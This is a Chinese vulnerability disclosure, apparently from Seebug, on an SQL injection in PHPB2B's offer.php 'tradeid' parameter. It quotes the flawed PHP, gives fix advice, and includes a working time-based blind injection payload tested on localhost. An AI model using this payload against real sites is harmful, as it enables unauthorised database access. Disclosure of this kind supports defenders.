### 简要描述:

RT

### 详细说明:

```
注入链接: /virtual-office/offer.php
注入参数: tradeid
漏洞代码: (第346行开始)
if(isset($_POST['refresh'])){
    if (!empty($_POST['refresh']) && !empty($_POST['tradeid'])) {
        $vals = array();
        $pre_submittime = $pdb->GetOne("select max(submit_time) from {$tb_prefix}trades where member_id=".$the_memberid);
        if ($pre_submittime>($time_stamp-$tMaxDay*86400)) {
            flash("allow_refresh_day");
        }
        $vals['submit_time'] = $time_stamp;
        $vals['expire_days'] = 10;
        $vals['expire_time'] = $time_stamp+(24*3600*$vals['expire_days']);
        $conditions[]= "status='1'";
        $ids = implode(",", $_POST['tradeid']);
        $conditions[]= "id in (".$ids.")";
        $condition = implode(" AND ", $conditions);
        $sql = "update ".$trade->getTable()." set submit_time=".$time_stamp.",expire_days=10,expire_time=".$vals['expire_time']." where ".$condition;
        $result = $pdb->Execute($sql);
    }
}
```

`$ids = implode(",", $_POST['tradeid']);` 从前台获取 POST 数组参数 tradeid 后，直接用 implode 函数将其拼接为逗号分隔的字符串，并原样嵌入 SQL 语句，导致 UPDATE 注入漏洞。修复建议：对 tradeid 的每个元素做整型转换（例如 `array_map('intval', $_POST['tradeid'])`）或改用参数化查询。另外从上述代码看，`flash("allow_refresh_day")` 之后并未中止执行，UPDATE 语句照常执行；且 UPDATE 的 WHERE 条件只包含 status 和 id，没有像前面的查询那样限制 member_id，这两点也值得一并核对。

### 漏洞证明:

```
漏洞测试:
http://127.0.0.1/phpb2b/virtual-office/offer.php
Post: refresh=1&tradeid[]=1111)||if((length(user())=0),1,sleep(5))#
(此处为便于测试，将拼接后的 SQL 语句打印出来)
```

[<img src="https://images.seebug.org/upload/201502/091043347bcf26026c8f2fa3535c7da3030d8c5e.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/091043347bcf26026c8f2fa3535c7da3030d8c5e.png)

```
MySQL 日志:
```

[<img src="https://images.seebug.org/upload/201502/091043271c06b5a5be5618687358d5145a02f84c.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/091043271c06b5a5be5618687358d5145a02f84c.png)

```
成功执行延时注入
```